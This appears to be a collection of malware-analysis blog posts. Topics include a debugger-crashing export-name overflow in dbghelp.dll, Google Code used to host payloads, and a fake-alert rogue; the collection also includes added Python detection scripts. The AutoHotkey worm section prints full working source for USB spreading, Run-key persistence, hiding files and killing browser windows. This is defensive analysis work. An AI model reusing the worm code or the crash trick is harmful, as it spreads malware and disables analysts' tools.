Computer Forensics

Data Acquired and Frozen


In addition to checking for the presence of debuggers and virtual environments, malware has started exploiting the debugging tools themselves. Recently we came across a new variant of BKDR.IRCBot that performs such a trick by exploiting a previously unexplored vulnerability in the LoadExportSymbols() function of dbghelp.dll. The vulnerability causes Olly Debugger (or any other debugger) that uses the unfixed version of this DLL to crash or execute remote code when it loads such a crafted executable or DLL.

When any debugger tries to load the executable, it crashes without an error message or crash report. This looked like anti-debugging behaviour, which made me analyze the file further. Before loading it in a debugger, I noted that the file contained a TLS table entry with a TLS callback function registered. I then looked for other simple, documented anti-debugging tricks but could not find any. This is where we sensed that the malware was using some out-of-the-ordinary anti-debugging trick.

I went on to examine the file's structure: the Data Directory entries, the Import Table entries and the APIs they import, the Export Table, and so on. For an executable, the existence of an export table made me suspicious. It had a single exported function whose name was a very long run of random bytes. Parsing the file in a hex editor, I concluded that the exported function's name is 0xC1C bytes long. Now, what does this long name have to do with the crash of a debugger?

Further analysis narrowed the crash down to dbghelp.dll, a library imported by practically every debugger. The crash occurs inside the function LoadExportSymbols(). Looking at this module, I found that the function does not check the length of the export name string it copies from the buffer to the stack, which causes a stack buffer overflow in the module. This can be better understood from the illustration below.

In the figure, at address 0x6D529AFF the export name data is being copied from the buffer to the stack. The buffer can be seen in the dump window at 0x01E72613, and the corresponding data being moved onto the stack at 0x0012A491: the usual scenario found in any buffer overflow vulnerability.

If an analyst has not updated their toolset, in this case the dbghelp.dll in the OllyDbg directory, or any other application that uses this DLL, this method works as a simple anti-debugging technique.
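As an added example (not code from the original post), here is a small Python triage check that walks a PE file's export table and flags export names longer than a threshold, so a sample like the one above can be spotted before it is loaded into a debugger that still ships an unpatched dbghelp.dll. The PE parsing and the constructed sample image are mine; the 0xC1C name length is the one reported in the write-up.

```python
import struct

def rva_to_off(data: bytes, rva: int) -> int:
    """Map an RVA to a file offset using the section table."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    sec = pe + 24 + struct.unpack_from("<H", data, pe + 20)[0]
    for i in range(nsec):
        vsize, va, rsize, raw = struct.unpack_from("<IIII", data, sec + 40 * i + 8)
        if va <= rva < va + max(vsize, rsize):
            return rva - va + raw
    raise ValueError("RVA 0x%x is outside every section" % rva)

def export_names(data: bytes) -> list:
    """Names listed in the export directory (data directory entry 0)."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    magic = struct.unpack_from("<H", data, pe + 24)[0]        # 0x10B PE32, 0x20B PE32+
    rva = struct.unpack_from("<I", data, pe + 24 + (96 if magic == 0x10B else 112))[0]
    if rva == 0:
        return []
    ed = rva_to_off(data, rva)
    count, names_rva = struct.unpack_from("<I4xI", data, ed + 24)
    tbl = rva_to_off(data, names_rva)
    out = []
    for i in range(count):
        off = rva_to_off(data, struct.unpack_from("<I", data, tbl + 4 * i)[0])
        end = data.find(b"\0", off)               # an unterminated name runs to EOF
        out.append(data[off:] if end < 0 else data[off:end])
    return out

def oversized_exports(data: bytes, limit: int = 256) -> list:
    """(16-byte name prefix, length) for every export name longer than limit."""
    return [(n[:16], len(n)) for n in export_names(data) if len(n) > limit]

def build_sample(export_name: bytes) -> bytes:
    """Constructed minimal PE32 image (not loadable) with one named export."""
    rva, raw, body = 0x1000, 0x200, bytearray(50)  # export dir (40) + 3 one-entry tables
    body += export_name + b"\0"
    struct.pack_into("<IIHHIIIIIII", body, 0, 0, 0, 0, 0, 0, 1, 1, 1,
                     rva + 40, rva + 44, rva + 48)  # NumberOfNames=1, table RVAs
    struct.pack_into("<I", body, 44, rva + 50)       # AddressOfNames[0] -> the name
    img = bytearray(raw)
    img[:2], img[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", img, 0x3C, 0x40)          # e_lfanew
    struct.pack_into("<HHIIIHH", img, 0x44, 0x14C, 1, 0, 0, 0, 224, 0x2102)
    struct.pack_into("<H", img, 0x58, 0x10B)         # PE32 optional-header magic
    struct.pack_into("<III", img, 0xB4, 16, rva, len(body))  # NumberOfRvaAndSizes, export dir
    img[0x138:0x140] = b".edata\0\0"                 # single section header
    struct.pack_into("<IIII", img, 0x140, len(body), rva, len(body), raw)
    return bytes(img + body)
```

Run `oversized_exports(open(path, "rb").read())` on a real sample; any hit is worth examining in a hex editor before the file goes anywhere near a debugger.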

Malware writers look for places to host their payloads so that the location can be hard-coded in the downloaders they distribute while the payload itself is swapped for a different file whenever they like; this lets them infect victims with a changing set of executables and stay undetected for longer. Google Code has become one such location, where malware writers keep a repository of such executables and modify it whenever necessary. The screenshot below shows one such example.

Most of the files are executables, along with some “.rar” archives. The timestamps show that the files have been uploaded over the course of the last couple of months. The download count also hints at the number of people who may be infected. This suggests that a Trojan-Downloader is actively using this free service to spread malware.

All the malware has to do is issue an HTTP GET request to download the file and then execute it on the victim's machine.

Another such Google Code page is displayed below.

The advantage for the malware is that these sites are not blocked by firewalls or Internet security suites, so the download bypasses that layer of protection. Because Google Code is a free hosting site for developers, attackers are taking advantage of the service to push their malware.

Abstract

File infector viruses modify the code of frequently used legitimate files in such a way that the malicious code runs before the original application's process starts. Malware achieves this by modifying or inserting malicious code into legitimate files so that it persists on the system even across shutdowns. This information is important for a forensic analyst assessing the damage caused by a malware infection. This paper discusses these topics, starting with an introduction to PE files, then the different types of PE infectors, their classification on the basis of infection method, and their behaviour, with examples.

My work experience of over 3 years as a senior threat research analyst with “Comodo antivirus” gave me lots of ideas and concepts, and kept me up to date with the latest malware and their infection methodologies. I chose this topic to share the experience from my research, since it has been an area of limited research: it needs a lot of understanding of both assembly language and Windows internal architecture.

Read more in the paper, which is available for free download here.

The AHK worm consists of 3 files along with the AHK compiler executable, packaged together as an archive named svchost.exe.

1. Contents of reproduce.txt

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return
reproduce:
Loop %ArrayCount%
{
element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1
}
}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return

This script makes sure that the registry entry and the files stay intact, and that every drive letter listed in driveList.txt gets infected.

2. Contents of script.txt

#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
}
return

3. Contents of “std.txt”

#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0

Contents of “stdoriginal.txt”

#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

4. Contents of “drivelist.txt”

c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
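As an added example that is not part of the original write-up, here is a Python triage function that flags, in AutoHotkey script text, the behaviours the four scripts above exhibit: Run-key persistence, forcing the hidden-files toggle off, checking for and copying to removable drive roots, suppressing the tray icon, and launching further scripts through the AHK runtime. The regexes are mine and are heuristics; the sample input is an excerpt of reproduce.txt and stdoriginal.txt as listed above, and the benign script is constructed.

```python
import re

# One regex per behaviour the write-up attributes to the worm; AHK commands
# are case-insensitive, so every rule is compiled with re.I. Heuristics only.
RULES = {
    "persistence: Run key written":
        re.compile(r"^\s*regwrite\b.*\\CurrentVersion\\(policies\\Explorer\\)?Run\b", re.I),
    "stealth: hidden-files toggle forced off":
        re.compile(r"^\s*regwrite\b.*\\Folder\\Hidden\\SHOWALL\b.*,\s*0\s*$", re.I),
    "stealth: tray icon suppressed":
        re.compile(r"^\s*#notrayicon\b", re.I),
    "spreading: removable-drive check":
        re.compile(r"^\s*ifequal\b.*\bRemovable\b", re.I),
    "spreading: directory copied to a drive root":
        re.compile(r"^\s*filecopydir\b.*,\s*%\w+%:\\", re.I),
    "execution: further script launched via the AHK runtime":
        re.compile(r"^\s*run\b.*\.(txt|ahk)\b", re.I),
}

def triage_ahk(script: str) -> dict:
    """Return {behaviour label: [1-based line numbers that matched]}."""
    hits = {}
    for no, line in enumerate(script.splitlines(), 1):
        for label, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(label, []).append(no)
    return hits

# Sample input: an excerpt of reproduce.txt and stdoriginal.txt as listed above.
SAMPLE = (
    "#notrayicon\n"
    "settimer,reproduce,5000\n"
    "driveget,data,Type,%element%:\\\n"
    "ifequal,data,Removable\n"
    "FileCopydir,C:\\heap41a\\offspring,%element%:\\,1\n"
    "Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\\Microsoft\\Windows\\CurrentVersion"
    "\\policies\\Explorer\\Run,winlogon,C:\\heap41a\\svchost.exe C:\\heap41a\\std.txt\n"
    "regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\\Microsoft\\Windows\\CurrentVersion"
    "\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL,checkedvalue,0\n"
    "Run C:\\heap41a\\svchost.exe C:\\heap41a\\reproduce.txt\n"
)
# Constructed benign script: only the tray-icon directive should fire.
BENIGN = "#notrayicon\nMsgBox, hello\n"

if __name__ == "__main__":
    for label, lines in sorted(triage_ahk(SAMPLE).items()):
        print(f"{label}: lines {lines}")
```

A single hit such as the tray-icon directive is common in legitimate scripts; it is the combination of persistence, spreading and stealth hits in one file that marks a sample like this one.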

We use Google search for everything in our lives, from gardening to university study to keeping ourselves up to date. How about a search for details on the recent Iceland volcanic activity leading to malware? Dangerous, isn't it? But it does happen occasionally. We need to be careful about the sites we visit from Google search results. Google is making every effort to keep bad results out of its search listings, but we still need to be careful.

This morning, casually searching Google in my Opera browser for the latest updates on the volcanic activity led me to a fantasy: a message box saying “Warning! Your computer is at risk of malware attacks”. I was happy: I had caught a rogue, a Fake-Alert. I decided to investigate it. I moved the message box aside and found my browser minimized under it. The screenshot below was taken in Firefox.

The message box told me “Warning! Your system is at risk of malware attacks” and assured me that it would help strengthen my system. I panicked and agreed to its request by clicking OK. It then opened a Firefox window and started scanning my system. It even displayed my IP address and my system environment parameters.

Once the scan completed, it alerted me that my system had a lot of problems that needed fixing; see the screenshot below. The problems reported were: 1. registry needs fixing, 2. outdated temporary junk files to remove, 3. hard disk defragmentation, 4. disk surface analysis, 5. webpage download speed.

I clicked the message box and it prompted me to download and save a file named “packupdate_build30_287.exe”, which I did. The hashes of the file are:

MD5:   9d44165fa043a2f9674055055233598e
SHA-1: f9e69be0459c57d187e786ff30a7609b2b6edcf0

Now, I let the file execute. It started extracting.

After extracting, a system scan started.

Finally,

My system is infected now!! Panic at the extreme!! Wanting to fix it, I clicked “remove all”. It kindly opened a window asking me to buy protection for 6 months ($65.00) or 1 year ($100.00).
Should I buy?

No, without any doubt. I executed the file in a cleanly built Windows XP SP2 virtual machine test environment running in non-persistent mode, so there is no chance of it actually being infected.
